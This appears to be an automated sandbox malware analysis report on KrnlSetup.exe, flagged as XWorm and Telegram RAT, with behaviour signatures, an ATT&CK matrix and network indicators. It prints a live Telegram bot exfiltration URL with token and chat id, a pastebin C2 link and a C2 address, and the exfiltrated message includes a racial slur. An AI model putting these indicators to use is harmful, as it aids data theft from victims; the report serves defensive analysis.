                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeQueries volume information: C:\ProgramData\ntoskrnl.exe VolumeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeQueries volume information: C:\ProgramData\ntoskrnl.exe VolumeInformation
                                    Source: C:\ProgramData\ntoskrnl.exeQueries volume information: C:\ProgramData\ntoskrnl.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: KrnlSetup.exe, 00000000.00000002.2636215682.000000001BDD5000.00000004.00000020.00020000.00000000.sdmp, KrnlSetup.exe, 00000000.00000002.2624968723.000000001B32F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2614356137.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: KrnlSetup.exe PID: 7120, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information1
                                    Scripting                                    		Valid Accounts12
                                    Windows Management Instrumentation                                    		1
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		OS Credential Dumping1
                                    File and Directory Discovery                                    		Remote Services11
                                    Archive Collected Data                                    		2
                                    Web Service                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Scheduled Task/Job                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory23
                                    System Information Discovery                                    		Remote Desktop Protocol1
                                    Screen Capture                                    		1
                                    Ingress Tool Transfer                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    PowerShell                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		21
                                    Obfuscated Files or Information                                    		Security Account Manager541
                                    Security Software Discovery                                    		SMB/Windows Admin SharesData from Network Shared Drive11
                                    Encrypted Channel                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCron21
                                    Registry Run Keys / Startup Folder                                    		21
                                    Registry Run Keys / Startup Folder                                    		2
                                    Software Packing                                    		NTDS1
                                    Process Discovery                                    		Distributed Component Object ModelInput Capture1
                                    Non-Standard Port                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets151
                                    Virtualization/Sandbox Evasion                                    		SSHKeylogging2
                                    Non-Application Layer Protocol                                    		Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    Masquerading                                    		Cached Domain Credentials1
                                    Application Window Discovery                                    		VNCGUI Input Capture13
                                    Application Layer Protocol                                    		Data Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Modify Registry                                    		DCSync1
                                    System Network Configuration Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                                    Virtualization/Sandbox Evasion                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572248 Sample: KrnlSetup.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 46 pastebin.com 2->46 48 api.telegram.org 2->48 50 ip-api.com 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 17 other signatures 2->68 8 KrnlSetup.exe 16 9 2->8         started        13 ntoskrnl.exe 2->13         started        15 ntoskrnl.exe 2->15         started        17 ntoskrnl.exe 2->17         started        signatures3 64 Connects to a pastebin service (likely for C&C) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 dnsIp5 52 115.69.183.222, 37593, 49751, 49797 TRUSTPOWERLTD-AS-APTrustPowerLtdNZ New Zealand 8->52 54 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->54 56 2 other IPs or domains 8->56 42 C:\ProgramData\ntoskrnl.exe, PE32 8->42 dropped 44 C:\Users\user\AppData\...\KrnlSetup.exe.log, CSV 8->44 dropped 72 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->72 74 Protects its processes via BreakOnTermination flag 8->74 76 Bypasses PowerShell execution policy 8->76 84 4 other signatures 8->84 19 powershell.exe 23 8->19         started        22 powershell.exe 22 8->22         started        24 powershell.exe 23 8->24         started        26 4 other processes 8->26 78 Antivirus detection for dropped file 13->78 80 Multi AV Scanner detection for dropped file 13->80 82 Machine Learning detection for dropped file 13->82 file6 signatures7 process8 signatures9 70 Loading BitLocker PowerShell Module 19->70 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        38 conhost.exe 26->38         started        40 2 other processes 26->40 process10

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    KrnlSetup.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                                    KrnlSetup.exe100%AviraTR/Spy.Gen
                                    KrnlSetup.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\ProgramData\ntoskrnl.exe100%AviraTR/Spy.Gen
                                    C:\ProgramData\ntoskrnl.exe100%Joe Sandbox ML
                                    C:\ProgramData\ntoskrnl.exe74%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    https://go.microsoft.co0%Avira URL Cloudsafe
                                    http://crl.mic0%Avira URL Cloudsafe
                                    http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    ip-api.com
                                    		208.95.112.1
                                    		truefalse
                                      		high
                                      api.telegram.org
                                      		149.154.167.220
                                      		truefalse
                                        		high
                                        pastebin.com
                                        		104.20.3.235
                                        		truefalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          https://pastebin.com/raw/5FinF5Mffalse
                                            		high
                                            https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzzfalse
                                              		high
                                              http://ip-api.com/line/?fields=hostingfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.orgKrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/botKrnlSetup.exe, ntoskrnl.exe.0.drfalse
                                                        		high
                                                        https://go.microsoft.copowershell.exe, 00000009.00000002.2034848231.00000231C178C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000B.00000002.2242720831.0000019028D4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://contoso.com/powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.micpowershell.exe, 00000009.00000002.2041628498.00000231C1B87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKrnlSetup.exe, 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=59991KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.20.3.235
                                                                              		pastebin.comUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              208.95.112.1
                                                                              		ip-api.comUnited States
                                                                              		53334TUT-ASUSfalse
                                                                              149.154.167.220
                                                                              		api.telegram.orgUnited Kingdom
                                                                              		62041TELEGRAMRUfalse
                                                                              115.69.183.222
                                                                              		unknownNew Zealand
                                                                              		55850TRUSTPOWERLTD-AS-APTrustPowerLtdNZtrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1572248
                                                                              Start date and time:2024-12-10 10:03:05 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 6m 45s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:24
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:KrnlSetup.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@28/24@3/4
                                                                              EGA Information:
                                                                              • Successful, ratio: 12.5%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 84
                                                                              • Number of non-executed functions: 7
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 52.149.20.212
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target ntoskrnl.exe, PID 2328 because it is empty
                                                                              • Execution Graph export aborted for target ntoskrnl.exe, PID 5428 because it is empty
                                                                              • Execution Graph export aborted for target ntoskrnl.exe, PID 652 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 1516 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 2056 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 3848 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 5776 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
